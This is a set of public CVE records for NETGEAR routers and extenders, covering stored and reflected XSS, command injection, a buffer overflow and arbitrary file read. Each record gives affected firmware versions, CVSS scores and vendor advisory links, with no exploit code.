Certain NETGEAR devices are affected by stored XSS. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6100 before 1.0.0.60, D6200 before 1.1.00.36, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, DM200 before 1.0.0.61, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6220 before 1.1.0.80, R6230 before 1.1.0.80, R6250 before 1.0.4.34, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6700v3 before 1.0.2.62, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7450 before 1.2.0.36, R7900 before 1.0.3.8, R7900P before 1.4.1.50, R8000 before 1.0.4.28, R8000P before 1.4.1.50, R8300 before 1.0.2.130, R8500 before 1.0.2.130, WNDR3400v3 before 1.0.1.24, WNR2020 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, XR450 before 2.3.2.40, and XR500 before 2.3.2.40.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T01:44:23.464Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://kb.netgear.com/000063758/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-and-Gateways-PSV-2018-0244"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by stored XSS. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6100 before 1.0.0.60, D6200 before 1.1.00.36, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, DM200 before 1.0.0.61, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6220 before 1.1.0.80, R6230 before 1.1.0.80, R6250 before 1.0.4.34, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6700v3 before 1.0.2.62, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7450 before 1.2.0.36, R7900 before 1.0.3.8, R7900P before 1.4.1.50, R8000 before 1.0.4.28, R8000P before 1.4.1.50, R8300 before 1.0.2.130, R8500 before 1.0.2.130, WNDR3400v3 before 1.0.1.24, WNR2020 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, XR450 before 2.3.2.40, and XR500 before 2.3.2.40."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:L/C:L/I:L/PR:H/S:U/UI:R",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-08-10T23:59:34",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://kb.netgear.com/000063758/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-and-Gateways-PSV-2018-0244"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-38534",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by stored XSS. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6100 before 1.0.0.60, D6200 before 1.1.00.36, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, DM200 before 1.0.0.61, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6220 before 1.1.0.80, R6230 before 1.1.0.80, R6250 before 1.0.4.34, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6700v3 before 1.0.2.62, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7450 before 1.2.0.36, R7900 before 1.0.3.8, R7900P before 1.4.1.50, R8000 before 1.0.4.28, R8000P before 1.4.1.50, R8300 before 1.0.2.130, R8500 before 1.0.2.130, WNDR3400v3 before 1.0.1.24, WNR2020 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, XR450 before 2.3.2.40, and XR500 before 2.3.2.40."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:L/C:L/I:L/PR:H/S:U/UI:R",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000063758/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-and-Gateways-PSV-2018-0244",
"refsource": "MISC",
"url": "https://kb.netgear.com/000063758/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-and-Gateways-PSV-2018-0244"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-38534",
"datePublished": "2021-08-10T23:59:34",
"dateReserved": "2021-08-10T00:00:00",
"dateUpdated": "2024-08-04T01:44:23.464Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2021-45550
Vulnerability from cvelistv5
Published
2021-12-26 00:51
Modified
2024-08-04 04:47
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.78, D6100 before 1.0.0.63, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DGN2200Bv4 before 1.0.0.109, DGN2200v4 before 1.0.0.110, R6250 before 1.0.4.34, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.66, R6700 before 1.0.2.6, R6700v3 before 1.0.2.66, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300 before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.56.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T04:47:00.024Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://kb.netgear.com/000064049/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0376"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.78, D6100 before 1.0.0.63, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DGN2200Bv4 before 1.0.0.109, DGN2200v4 before 1.0.0.110, R6250 before 1.0.4.34, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.66, R6700 before 1.0.2.6, R6700v3 before 1.0.2.66, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300 before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.56."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:R",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-12-26T00:51:50",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://kb.netgear.com/000064049/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0376"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-45550",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.78, D6100 before 1.0.0.63, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DGN2200Bv4 before 1.0.0.109, DGN2200v4 before 1.0.0.110, R6250 before 1.0.4.34, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.66, R6700 before 1.0.2.6, R6700v3 before 1.0.2.66, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300 before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.56."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:R",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000064049/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0376",
"refsource": "MISC",
"url": "https://kb.netgear.com/000064049/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0376"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-45550",
"datePublished": "2021-12-26T00:51:50",
"dateReserved": "2021-12-25T00:00:00",
"dateUpdated": "2024-08-04T04:47:00.024Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2021-38525
Vulnerability from cvelistv5
Published
2021-08-11 00:01
Modified
2024-08-04 01:44
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T01:44:22.942Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://kb.netgear.com/000063759/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2018-0378"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-08-11T00:01:29",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://kb.netgear.com/000063759/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2018-0378"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-38525",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000063759/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2018-0378",
"refsource": "MISC",
"url": "https://kb.netgear.com/000063759/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2018-0378"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-38525",
"datePublished": "2021-08-11T00:01:29",
"dateReserved": "2021-08-10T00:00:00",
"dateUpdated": "2024-08-04T01:44:22.942Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20756
Vulnerability from cvelistv5
Published
2020-04-16 21:08
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by reflected XSS. This affects EX7000 before 1.0.0.64, EX6200 before 1.0.3.86, EX6150 before 1.0.0.38, EX6130 before 1.0.0.22, EX6120 before 1.0.0.40, EX6100 before 1.0.2.22, EX6000 before 1.0.0.30, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, R8300 before 1.0.2.94, R7300DST before 1.0.0.62, R7000P before 1.3.0.20, R6900P before 1.3.0.20, R6400 before 1.0.1.32, R6300v2 before 1.0.4.24, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.18, and WN2500RPv2 before 1.0.1.52.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:09.007Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000060643/Security-Advisory-for-Reflected-Cross-Site-Scripting-on-Some-Routers-and-Extenders-PSV-2017-0709"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by reflected XSS. This affects EX7000 before 1.0.0.64, EX6200 before 1.0.3.86, EX6150 before 1.0.0.38, EX6130 before 1.0.0.22, EX6120 before 1.0.0.40, EX6100 before 1.0.2.22, EX6000 before 1.0.0.30, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, R8300 before 1.0.2.94, R7300DST before 1.0.0.62, R7000P before 1.3.0.20, R6900P before 1.3.0.20, R6400 before 1.0.1.32, R6300v2 before 1.0.4.24, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.18, and WN2500RPv2 before 1.0.1.52."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:H/I:L/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T21:08:55",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000060643/Security-Advisory-for-Reflected-Cross-Site-Scripting-on-Some-Routers-and-Extenders-PSV-2017-0709"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20756",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by reflected XSS. This affects EX7000 before 1.0.0.64, EX6200 before 1.0.3.86, EX6150 before 1.0.0.38, EX6130 before 1.0.0.22, EX6120 before 1.0.0.40, EX6100 before 1.0.2.22, EX6000 before 1.0.0.30, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, R8300 before 1.0.2.94, R7300DST before 1.0.0.62, R7000P before 1.3.0.20, R6900P before 1.3.0.20, R6400 before 1.0.1.32, R6300v2 before 1.0.4.24, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.18, and WN2500RPv2 before 1.0.1.52."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "NONE",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:H/I:L/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000060643/Security-Advisory-for-Reflected-Cross-Site-Scripting-on-Some-Routers-and-Extenders-PSV-2017-0709",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000060643/Security-Advisory-for-Reflected-Cross-Site-Scripting-on-Some-Routers-and-Extenders-PSV-2017-0709"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20756",
"datePublished": "2020-04-16T21:08:55",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:09.007Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18752
Vulnerability from cvelistv5
Published
2020-04-22 16:15
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by an attacker's ability to read arbitrary files. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.94.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:42.893Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000051502/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Extenders-PSV-2017-0319"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.94."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-22T16:15:33",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000051502/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Extenders-PSV-2017-0319"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18752",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.94."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000051502/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Extenders-PSV-2017-0319",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000051502/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Extenders-PSV-2017-0319"
}
]
}
